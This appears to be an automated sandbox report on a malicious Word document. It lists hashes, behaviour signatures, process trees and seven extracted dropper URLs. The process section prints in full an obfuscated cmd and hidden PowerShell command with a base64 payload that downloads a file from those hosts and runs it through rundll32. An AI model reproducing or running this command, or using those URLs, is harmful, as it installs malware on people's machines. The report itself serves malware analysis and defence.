Analysis

  • max time kernel
    107s
  • max time network
    46s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    03-05-2022 12:11

General

  • Target

    txbeodxf.doc

  • Size

    183KB

  • MD5

    b66d8fe119418a8a69d1276b36eb2fc0

  • SHA1

    4b921043d94136bca5d42ad98a1b7e962a5b9af1

  • SHA256

    768f3c029cc79ae21d7c732487da93f0e8c7d19a83737f9ce7e107e3adc9054c

  • SHA512

    05c0872774d550fb5450c91ddec5ee4dc9c61cad79fa9c2980b1b6e0996d315c147fcb4331a6a841bc730d05a047411f1eeda274c32edd491547e866f6cdac07

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://superiorsurfacings.com/pc-not-qgtje/j8T3S/

exe.dropper

http://tenrougroup.com/j/Hb7Wf/

exe.dropper

http://syokmelaram.com/wp-includes/e1/

exe.dropper

http://advokatemelyanov.ru/administrator/OMHpK/

exe.dropper

http://mumglobal.com/content/DF0/

exe.dropper

http://mvldesign.ca/Durani/2lZs/

exe.dropper

https://eytsoft.com/css/Q2k/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\txbeodxf.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1376
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1400
    • C:\Windows\system32\cmd.exe
      cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD UwBlAHQAIAAoACcAVQAnACsAJwAyADYAcwBUACcAKQAgACAAKABbAFQAWQBwAGUAXQAoACIAewAzAH0AewA1AH0AewA0AH0AewAwAH0AewAxAH0AewAyAH0AewA2AH0AIgAtAEYAJwBPAC4AZABpAHIAJwAsACcAZQBjAFQAbwAnACwAJwByACcALAAnAFMAJwAsACcAaQAnACwAJwB5AHMAVABlAE0ALgAnACwAJwB5ACcAKQApACAAOwAgACQAVwBFAHYAYgBoAG8APQBbAHQAeQBQAGUAXQAoACIAewA1AH0AewA3AH0AewAxAH0AewA4AH0AewAwAH0AewA2AH0AewAyAH0AewAzAH0AewA0AH0AIgAgAC0ARgAnAHQALgBTACcALAAnAG0ALgBOACcALAAnAFIAVgAnACwAJwBJAEMARQBQAG8AaQBuAHQAJwAsACcAbQBhAE4AQQBHAEUAUgAnACwAJwBTACcALAAnAEUAJwAsACcAeQBTAFQARQAnACwAJwBlACcAKQAgADsAIAAgACAAcwBlAFQALQBpAHQAZQBNACAAKAAnAHYAQQByACcAKwAnAEkAYQBCAEwARQA6ADMAJwArACcAdwByACcAKQAgACgAWwBUAFkAcABFAF0AKAAiAHsAMwB9AHsANAB9AHsAMQB9AHsAMAB9AHsAMgB9ACIAIAAtAEYAIAAnAGkAZQAnACwAJwBMACcALAAnAE4AVAAnACwAJwBOAEUAdAAuAHcAJwAsACcAZQBiAGMAJwApACAAIAApADsAIAAkAEsAMgA5AFAAPQAoACcAWgA5ACcAKwAnADgATwAnACkAOwAkAFEAMABvADkAawBzAGcAPQAkAEwANgAzAEsAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAE0AMAAyAFYAOwAkAEsAMgBfAFMAPQAoACcAWAAnACsAKAAnADgAOQAnACsAJwBVACcAKQApADsAIAAgACgAbABTACAAKAAnAHYAQQBSAGkAJwArACcAQQBiACcAKwAnAEwARQAnACsAJwA6AFUAMgA2AFMAdAAnACkAIAAgACkALgB2AEEATAB1AGUAOgA6ACIAYwByAEUAYABBAHQAYABlAGQAaQBgAFIARQBDAFQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBFAGcAJwArACgAJwB3ACcAKwAnAFIAaAAnACkAKwAnADcAYwAnACsAKAAnAGUAYQAnACsAJwB2AEUAJwArACcAZwB3AEsAYgBlAHMAJwArACcAYwA0AGwARQBnACcAKQArACcAdwAnACkALgAiAFIARQBQAGAAbABBAGMAZQAiACgAKABbAEMAaABhAFIAXQA2ADkAKwBbAEMAaABhAFIAXQAxADAAMwArAFsAQwBoAGEAUgBdADEAMQA5ACkALABbAHMAVAByAEkAbgBnAF0AWwBDAGgAYQBSAF0AOQAyACkAKQApADsAJABXADAAOABJAD0AKAAoACcAQwAnACsAJwA4ADcAJwApACsAJwBNACcAKQA7ACAAJAB3AGUAdgBiAEgATwA6ADoAIgBzAEUAYwBgAFUAYABSAEkAdABgAFkAUAByAE8AYABUAE8AYwBvAGwAIgAgAD0AIAAoACgAJwBUAGwAJwArACcAcwAxACcAKQArACcAMgAnACkAOwAkAEsAMwA2AEsAPQAoACgAJwBEACcAKwAnADEAXwAnACkAKwAnAFIAJwApADsAJABTAGEAZwBjADUANwBrACAAPQAgACgAJwBRACcAKwAoACcAXwAnACsAJwBfAFcAJwApACkAOwAkAEgAMwAyAEUAPQAoACcASQAnACsAKAAnADEAXwAnACsAJwBVACcAKQApADsAJABaAGMAcQByAHgAawBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwACcAKwAnAH0AUgAnACsAKAAnAGgANwAnACsAJwBjACcAKQArACcAZQAnACsAJwBhAHYAewAwAH0AJwArACgAJwBLAGIAJwArACcAZQBzACcAKwAnAGMANABsACcAKQArACcAewAwAH0AJwApACAAIAAtAGYAIABbAGMAaABhAHIAXQA5ADIAKQArACQAUwBhAGcAYwA1ADcAawArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAFAAOQAwAFcAPQAoACcAVgA0ACcAKwAnADcARAAnACkAOwAkAEkAdQBoAHQAdwBiAGIAPQAoACgAKAAoACcAKQApAGMAJwArACcAKAAoAHcAJwApACkAKwAoACgAJwAoADoALwAnACsAJwAvAHMAJwApACkAKwAoACcAdQBwAGUAJwArACcAcgBpACcAKQArACgAJwBvAHIAcwB1AHIAZgBhAGMAaQBuAGcAJwArACcAcwAuACcAKwAnAGMAbwAnACsAJwBtAC8AJwArACcAcABjACcAKwAnAC0AJwArACcAbgAnACsAJwBvAHQALQBxACcAKQArACcAZwB0ACcAKwAoACcAagBlAC8AagAnACsAJwA4AFQAJwApACsAKAAoACcAMwBTACcAKwAnAC8AQAApACcAKQApACsAKAAoACcAKQBjACcAKQApACsAKAAoACcAKAAnACsAJwAoAHcAJwApACkAKwAoACgAJwAoADoALwAnACsAJwAvACcAKQApACsAKAAnAHQAJwArACcAZQBuACcAKQArACgAJwByAG8AJwArACcAdQAnACkAKwAoACcAZwByAG8AJwArACcAdQBwAC4AYwBvACcAKwAnAG0AJwApACsAJwAvACcAKwAoACcAagAvAEgAJwArACcAYgAnACkAKwAoACgAJwA3ACcAKwAnAFcAZgAnACsAJwAvAEAAKQApAGMAJwApACkAKwAoACgAJwAoACgAdwAnACsAJwAoADoAJwApACkAKwAoACcALwAnACsAJwAvAHMAeQAnACkAKwAnAG8AawAnACsAJwBtACcAKwAnAGUAbAAnACsAJwBhACcAKwAoACcAcgAnACsAJwBhAG0ALgBjACcAKQArACgAJwBvACcAKwAnAG0ALwAnACkAKwAoACcAdwAnACsAJwBwAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkAGUAJwArACcAcwAnACkAKwAnAC8AZQAnACsAKAAoACcAMQAnACsAJwAvAEAAKQApAGMAJwApACkAKwAoACgAJwAoACcAKwAnACgAdwAoACcAKQApACsAKAAnADoALwAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAdgAnACsAJwBvACcAKQArACcAawBhACcAKwAnAHQAJwArACgAJwBlAG0AZQAnACsAJwBsACcAKQArACcAeQBhACcAKwAoACcAbgAnACsAJwBvAHYAJwApACsAJwAuACcAKwAoACcAcgAnACsAJwB1AC8AYQAnACkAKwAnAGQAbQAnACsAJwBpACcAKwAnAG4AJwArACgAJwBpAHMAJwArACcAdAByACcAKQArACgAJwBhACcAKwAnAHQAbwAnACsAJwByAC8ATwBNACcAKQArACgAKAAnAEgAJwArACcAcABLAC8AQAAnACsAJwApACkAJwApACkAKwAnAGMAJwArACgAKAAnACgAKAB3ACgAOgAvAC8AJwArACcAbQAnACsAJwB1ACcAKwAnAG0AZwAnACkAKQArACcAbAAnACsAKAAnAG8AYgBhACcAKwAnAGwAJwArACcALgBjAG8AbQAvACcAKwAnAGMAbwBuACcAKQArACgAJwB0ACcAKwAnAGUAbgB0AC8ARAAnACkAKwAoACgAJwBGADAALwAnACsAJwBAACkAKQAnACkAKQArACcAYwAnACsAKAAoACcAKAAoAHcAKAAnACsAJwA6ACcAKQApACsAKAAnAC8ALwAnACsAJwBtACcAKQArACgAJwB2ACcAKwAnAGwAZABlAHMAJwArACcAaQAnACkAKwAoACcAZwBuAC4AYwAnACsAJwBhACcAKQArACgAJwAvACcAKwAnAEQAdQAnACkAKwAoACcAcgBhAG4AJwArACcAaQAvACcAKQArACgAKAAnADIAbAAnACsAJwBaAHMALwBAACkAKQBjACgAJwArACcAKAAnACkAKQArACgAKAAnAHcAJwArACcAKABzADoAJwApACkAKwAnAC8ALwAnACsAJwBlACcAKwAnAHkAJwArACgAJwB0ACcAKwAnAHMAbwBmAHQALgBjACcAKQArACcAbwAnACsAKAAnAG0ALwAnACsAJwBjACcAKQArACgAJwBzAHMALwAnACsAJwBRADIAJwApACsAJwBrACcAKwAnAC8AJwApACkALgAiAHIAYABlAFAATABgAEEAQwBlACIAKAAoACgAKAAoACcAKQApACcAKwAnAGMAJwApACkAKwAoACgAJwAoACcAKwAnACgAdwAnACkAKQArACcAKAAnACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAcwBkACcALAAnAHMAdwAnACkALAAoACcAaAAnACsAKAAnAHQAJwArACcAdABwACcAKQApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAHMAYABQAGwASQB0ACIAKAAkAEcANwA2AEQAIAArACAAJABRADAAbwA5AGsAcwBnACAAKwAgACQAVgA4ADIARQApADsAJABYADAAOQBTAD0AKAAoACcAVwA3ACcAKwAnADUAJwApACsAJwBOACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQATwA2AHgAZABwAHgAbQAgAGkAbgAgACQASQB1AGgAdAB3AGIAYgApAHsAdAByAHkAewAgACAAJAAzAFcAUgA6ADoAIgBuAGAAZQBXACIAKAApAC4AIgBEAG8AYABXAG4AYABsAG8AYABBAEQAZgBJAEwARQAiACgAJABPADYAeABkAHAAeABtACwAIAAkAFoAYwBxAHIAeABrAGcAKQA7ACQASgA0ADgATwA9ACgAJwBIACcAKwAoACcAMgAnACsAJwAyAEoAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQAWgBjAHEAcgB4AGsAZwApAC4AIgBsAGUATgBnAGAAVABIACIAIAAtAGcAZQAgADQANgAwADAAMgApACAAewAmACgAJwByAHUAbgBkAGwAbAAnACsAJwAzADIAJwApACAAJABaAGMAcQByAHgAawBnACwAJwAjADEAJwAuACIAVABPAHMAdABgAFIAYABJAG4AZwAiACgAKQA7ACQASQAwADAASwA9ACgAJwBUACcAKwAoACcAXwAnACsAJwAwAEQAJwApACkAOwBiAHIAZQBhAGsAOwAkAFkAOQA3AFkAPQAoACgAJwBCACcAKwAnADMANwAnACkAKwAnAEwAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABYADIAOQBSAD0AKAAoACcAWAAnACsAJwBfADIAJwApACsAJwBBACcAKQA=
      1⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:584
      • C:\Windows\system32\msg.exe
        msg Admin /v Word experienced an error trying to open the file.
        2⤵
          PID:768
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          POwersheLL -w hidden -ENCOD UwBlAHQAIAAoACcAVQAnACsAJwAyADYAcwBUACcAKQAgACAAKABbAFQAWQBwAGUAXQAoACIAewAzAH0AewA1AH0AewA0AH0AewAwAH0AewAxAH0AewAyAH0AewA2AH0AIgAtAEYAJwBPAC4AZABpAHIAJwAsACcAZQBjAFQAbwAnACwAJwByACcALAAnAFMAJwAsACcAaQAnACwAJwB5AHMAVABlAE0ALgAnACwAJwB5ACcAKQApACAAOwAgACQAVwBFAHYAYgBoAG8APQBbAHQAeQBQAGUAXQAoACIAewA1AH0AewA3AH0AewAxAH0AewA4AH0AewAwAH0AewA2AH0AewAyAH0AewAzAH0AewA0AH0AIgAgAC0ARgAnAHQALgBTACcALAAnAG0ALgBOACcALAAnAFIAVgAnACwAJwBJAEMARQBQAG8AaQBuAHQAJwAsACcAbQBhAE4AQQBHAEUAUgAnACwAJwBTACcALAAnAEUAJwAsACcAeQBTAFQARQAnACwAJwBlACcAKQAgADsAIAAgACAAcwBlAFQALQBpAHQAZQBNACAAKAAnAHYAQQByACcAKwAnAEkAYQBCAEwARQA6ADMAJwArACcAdwByACcAKQAgACgAWwBUAFkAcABFAF0AKAAiAHsAMwB9AHsANAB9AHsAMQB9AHsAMAB9AHsAMgB9ACIAIAAtAEYAIAAnAGkAZQAnACwAJwBMACcALAAnAE4AVAAnACwAJwBOAEUAdAAuAHcAJwAsACcAZQBiAGMAJwApACAAIAApADsAIAAkAEsAMgA5AFAAPQAoACcAWgA5ACcAKwAnADgATwAnACkAOwAkAFEAMABvADkAawBzAGcAPQAkAEwANgAzAEsAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAE0AMAAyAFYAOwAkAEsAMgBfAFMAPQAoACcAWAAnACsAKAAnADgAOQAnACsAJwBVACcAKQApADsAIAAgACgAbABTACAAKAAnAHYAQQBSAGkAJwArACcAQQBiACcAKwAnAEwARQAnACsAJwA6AFUAMgA2AFMAdAAnACkAIAAgACkALgB2AEEATAB1AGUAOgA6ACIAYwByAEUAYABBAHQAYABlAGQAaQBgAFIARQBDAFQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBFAGcAJwArACgAJwB3ACcAKwAnAFIAaAAnACkAKwAnADcAYwAnACsAKAAnAGUAYQAnACsAJwB2AEUAJwArACcAZwB3AEsAYgBlAHMAJwArACcAYwA0AGwARQBnACcAKQArACcAdwAnACkALgAiAFIARQBQAGAAbABBAGMAZQAiACgAKABbAEMAaABhAFIAXQA2ADkAKwBbAEMAaABhAFIAXQAxADAAMwArAFsAQwBoAGEAUgBdADEAMQA5ACkALABbAHMAVAByAEkAbgBnAF0AWwBDAGgAYQBSAF0AOQAyACkAKQApADsAJABXADAAOABJAD0AKAAoACcAQwAnACsAJwA4ADcAJwApACsAJwBNACcAKQA7ACAAJAB3AGUAdgBiAEgATwA6ADoAIgBzAEUAYwBgAFUAYABSAEkAdABgAFkAUAByAE8AYABUAE8AYwBvAGwAIgAgAD0AIAAoACgAJwBUAGwAJwArACcAcwAxACcAKQArACcAMgAnACkAOwAkAEsAMwA2AEsAPQAoACgAJwBEACcAKwAnADEAXwAnACkAKwAnAFIAJwApADsAJABTAGEAZwBjADUANwBrACAAPQAgACgAJwBRACcAKwAoACcAXwAnACsAJwBfAFcAJwApACkAOwAkAEgAMwAyAEUAPQAoACcASQAnACsAKAAnADEAXwAnACsAJwBVACcAKQApADsAJABaAGMAcQByAHgAawBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwACcAKwAnAH0AUgAnACsAKAAnAGgANwAnACsAJwBjACcAKQArACcAZQAnACsAJwBhAHYAewAwAH0AJwArACgAJwBLAGIAJwArACcAZQBzACcAKwAnAGMANABsACcAKQArACcAewAwAH0AJwApACAAIAAtAGYAIABbAGMAaABhAHIAXQA5ADIAKQArACQAUwBhAGcAYwA1ADcAawArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAFAAOQAwAFcAPQAoACcAVgA0ACcAKwAnADcARAAnACkAOwAkAEkAdQBoAHQAdwBiAGIAPQAoACgAKAAoACcAKQApAGMAJwArACcAKAAoAHcAJwApACkAKwAoACgAJwAoADoALwAnACsAJwAvAHMAJwApACkAKwAoACcAdQBwAGUAJwArACcAcgBpACcAKQArACgAJwBvAHIAcwB1AHIAZgBhAGMAaQBuAGcAJwArACcAcwAuACcAKwAnAGMAbwAnACsAJwBtAC8AJwArACcAcABjACcAKwAnAC0AJwArACcAbgAnACsAJwBvAHQALQBxACcAKQArACcAZwB0ACcAKwAoACcAagBlAC8AagAnACsAJwA4AFQAJwApACsAKAAoACcAMwBTACcAKwAnAC8AQAApACcAKQApACsAKAAoACcAKQBjACcAKQApACsAKAAoACcAKAAnACsAJwAoAHcAJwApACkAKwAoACgAJwAoADoALwAnACsAJwAvACcAKQApACsAKAAnAHQAJwArACcAZQBuACcAKQArACgAJwByAG8AJwArACcAdQAnACkAKwAoACcAZwByAG8AJwArACcAdQBwAC4AYwBvACcAKwAnAG0AJwApACsAJwAvACcAKwAoACcAagAvAEgAJwArACcAYgAnACkAKwAoACgAJwA3ACcAKwAnAFcAZgAnACsAJwAvAEAAKQApAGMAJwApACkAKwAoACgAJwAoACgAdwAnACsAJwAoADoAJwApACkAKwAoACcALwAnACsAJwAvAHMAeQAnACkAKwAnAG8AawAnACsAJwBtACcAKwAnAGUAbAAnACsAJwBhACcAKwAoACcAcgAnACsAJwBhAG0ALgBjACcAKQArACgAJwBvACcAKwAnAG0ALwAnACkAKwAoACcAdwAnACsAJwBwAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkAGUAJwArACcAcwAnACkAKwAnAC8AZQAnACsAKAAoACcAMQAnACsAJwAvAEAAKQApAGMAJwApACkAKwAoACgAJwAoACcAKwAnACgAdwAoACcAKQApACsAKAAnADoALwAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAdgAnACsAJwBvACcAKQArACcAawBhACcAKwAnAHQAJwArACgAJwBlAG0AZQAnACsAJwBsACcAKQArACcAeQBhACcAKwAoACcAbgAnACsAJwBvAHYAJwApACsAJwAuACcAKwAoACcAcgAnACsAJwB1AC8AYQAnACkAKwAnAGQAbQAnACsAJwBpACcAKwAnAG4AJwArACgAJwBpAHMAJwArACcAdAByACcAKQArACgAJwBhACcAKwAnAHQAbwAnACsAJwByAC8ATwBNACcAKQArACgAKAAnAEgAJwArACcAcABLAC8AQAAnACsAJwApACkAJwApACkAKwAnAGMAJwArACgAKAAnACgAKAB3ACgAOgAvAC8AJwArACcAbQAnACsAJwB1ACcAKwAnAG0AZwAnACkAKQArACcAbAAnACsAKAAnAG8AYgBhACcAKwAnAGwAJwArACcALgBjAG8AbQAvACcAKwAnAGMAbwBuACcAKQArACgAJwB0ACcAKwAnAGUAbgB0AC8ARAAnACkAKwAoACgAJwBGADAALwAnACsAJwBAACkAKQAnACkAKQArACcAYwAnACsAKAAoACcAKAAoAHcAKAAnACsAJwA6ACcAKQApACsAKAAnAC8ALwAnACsAJwBtACcAKQArACgAJwB2ACcAKwAnAGwAZABlAHMAJwArACcAaQAnACkAKwAoACcAZwBuAC4AYwAnACsAJwBhACcAKQArACgAJwAvACcAKwAnAEQAdQAnACkAKwAoACcAcgBhAG4AJwArACcAaQAvACcAKQArACgAKAAnADIAbAAnACsAJwBaAHMALwBAACkAKQBjACgAJwArACcAKAAnACkAKQArACgAKAAnAHcAJwArACcAKABzADoAJwApACkAKwAnAC8ALwAnACsAJwBlACcAKwAnAHkAJwArACgAJwB0ACcAKwAnAHMAbwBmAHQALgBjACcAKQArACcAbwAnACsAKAAnAG0ALwAnACsAJwBjACcAKQArACgAJwBzAHMALwAnACsAJwBRADIAJwApACsAJwBrACcAKwAnAC8AJwApACkALgAiAHIAYABlAFAATABgAEEAQwBlACIAKAAoACgAKAAoACcAKQApACcAKwAnAGMAJwApACkAKwAoACgAJwAoACcAKwAnACgAdwAnACkAKQArACcAKAAnACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAcwBkACcALAAnAHMAdwAnACkALAAoACcAaAAnACsAKAAnAHQAJwArACcAdABwACcAKQApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAHMAYABQAGwASQB0ACIAKAAkAEcANwA2AEQAIAArACAAJABRADAAbwA5AGsAcwBnACAAKwAgACQAVgA4ADIARQApADsAJABYADAAOQBTAD0AKAAoACcAVwA3ACcAKwAnADUAJwApACsAJwBOACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQATwA2AHgAZABwAHgAbQAgAGkAbgAgACQASQB1AGgAdAB3AGIAYgApAHsAdAByAHkAewAgACAAJAAzAFcAUgA6ADoAIgBuAGAAZQBXACIAKAApAC4AIgBEAG8AYABXAG4AYABsAG8AYABBAEQAZgBJAEwARQAiACgAJABPADYAeABkAHAAeABtACwAIAAkAFoAYwBxAHIAeABrAGcAKQA7ACQASgA0ADgATwA9ACgAJwBIACcAKwAoACcAMgAnACsAJwAyAEoAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQAWgBjAHEAcgB4AGsAZwApAC4AIgBsAGUATgBnAGAAVABIACIAIAAtAGcAZQAgADQANgAwADAAMgApACAAewAmACgAJwByAHUAbgBkAGwAbAAnACsAJwAzADIAJwApACAAJABaAGMAcQByAHgAawBnACwAJwAjADEAJwAuACIAVABPAHMAdABgAFIAYABJAG4AZwAiACgAKQA7ACQASQAwADAASwA9ACgAJwBUACcAKwAoACcAXwAnACsAJwAwAEQAJwApACkAOwBiAHIAZQBhAGsAOwAkAFkAOQA3AFkAPQAoACgAJwBCACcAKwAnADMANwAnACkAKwAnAEwAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABYADIAOQBSAD0AKAAoACcAWAAnACsAJwBfADIAJwApACsAJwBBACcAKQA=
          2⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1612

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Defense Evasion

      Modify Registry

      1
      T1112

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/768-73-0x0000000000000000-mapping.dmp
      • memory/1376-64-0x00000000005E3000-0x00000000005E6000-memory.dmp
        Filesize

        12KB

      • memory/1376-59-0x0000000005B5A000-0x0000000005B63000-memory.dmp
        Filesize

        36KB

      • memory/1376-67-0x00000000005E3000-0x00000000005E6000-memory.dmp
        Filesize

        12KB

      • memory/1376-55-0x0000000070991000-0x0000000070993000-memory.dmp
        Filesize

        8KB

      • memory/1376-70-0x00000000005E3000-0x00000000005E6000-memory.dmp
        Filesize

        12KB

      • memory/1376-60-0x0000000005B5A000-0x0000000005B63000-memory.dmp
        Filesize

        36KB

      • memory/1376-61-0x00000000005E3000-0x00000000005E6000-memory.dmp
        Filesize

        12KB

      • memory/1376-62-0x00000000005E3000-0x00000000005E6000-memory.dmp
        Filesize

        12KB

      • memory/1376-63-0x00000000005E3000-0x00000000005E6000-memory.dmp
        Filesize

        12KB

      • memory/1376-54-0x0000000072F11000-0x0000000072F14000-memory.dmp
        Filesize

        12KB

      • memory/1376-57-0x000000007197D000-0x0000000071988000-memory.dmp
        Filesize

        44KB

      • memory/1376-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
        Filesize

        64KB

      • memory/1376-58-0x0000000075AE1000-0x0000000075AE3000-memory.dmp
        Filesize

        8KB

      • memory/1376-82-0x000000005FFF0000-0x0000000060000000-memory.dmp
        Filesize

        64KB

      • memory/1400-80-0x0000000000000000-mapping.dmp
      • memory/1612-75-0x000007FEFC5C1000-0x000007FEFC5C3000-memory.dmp
        Filesize

        8KB

      • memory/1612-76-0x000007FEF3DF0000-0x000007FEF494D000-memory.dmp
        Filesize

        11.4MB

      • memory/1612-78-0x00000000027D4000-0x00000000027D7000-memory.dmp
        Filesize

        12KB

      • memory/1612-77-0x000000001B7E0000-0x000000001BADF000-memory.dmp
        Filesize

        3.0MB

      • memory/1612-79-0x00000000027DB000-0x00000000027FA000-memory.dmp
        Filesize

        124KB

      • memory/1612-74-0x0000000000000000-mapping.dmp